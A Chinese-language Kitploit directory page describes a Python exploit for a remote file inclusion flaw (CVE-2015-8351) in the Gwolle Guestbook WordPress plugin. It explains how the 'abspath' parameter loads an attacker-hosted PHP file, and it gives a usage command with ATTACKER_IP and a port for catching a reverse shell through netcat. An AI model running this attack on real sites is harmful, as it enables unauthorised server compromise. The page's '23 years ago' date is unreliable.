Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
exploit-CVE-2015-8351 — WordPress 插件 Gwolle Guestbook 1.5.3 - 远程文件包含 | Kitploit
工具/GitHubGitHub/g4sp4rcs/exploit-cve-2015-8351
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubg4sp4rcs/exploit-cve-2015-8351

exploit-CVE-2015-8351

WordPress 插件 Gwolle Guestbook 1.5.3 - 远程文件包含

查看仓库
23年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Gwolle Guestbook WordPress 插件 RFI 漏洞利用

此 Python 脚本利用了 Gwolle Guestbook WordPress 插件中的一个严重远程文件包含(RFI)漏洞,未经身份验证的攻击者可以利用该漏洞包含远程 PHP 文件并在易受攻击的系统上执行任意代码。

漏洞详情

HTTP GET 参数 "abspath" 在被用于 PHP require() 函数之前未经过正确的清理。远程攻击者可以从任意远程服务器包含名为 'wp-load.php' 的文件,并在易受攻击的 Web 服务器上执行其内容。为此,攻击者需要将一个恶意的 'wp-load.php' 文件放置在其服务器文档根目录中,并将服务器 URL 包含到请求中。

成功利用此漏洞可能导致整个 WordPress 安装被入侵,甚至可能导致整个 Web 服务器被入侵。

使用方法

该脚本需要三个参数:

  • 目标 URL:易受攻击的 WordPress 安装的 URL。
  • 攻击者主机:攻击者机器的 IP 地址或主机名。
  • 攻击者端口:攻击者监听反向 shell 的端口号。

示例:

root@kitploit:~
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT

注意:你需要在攻击者机器上打开指定端口的 netcat 监听器。

免责声明

此脚本仅用于教育目的。作者不对因滥用此脚本而造成的任何损害负责。

下载工具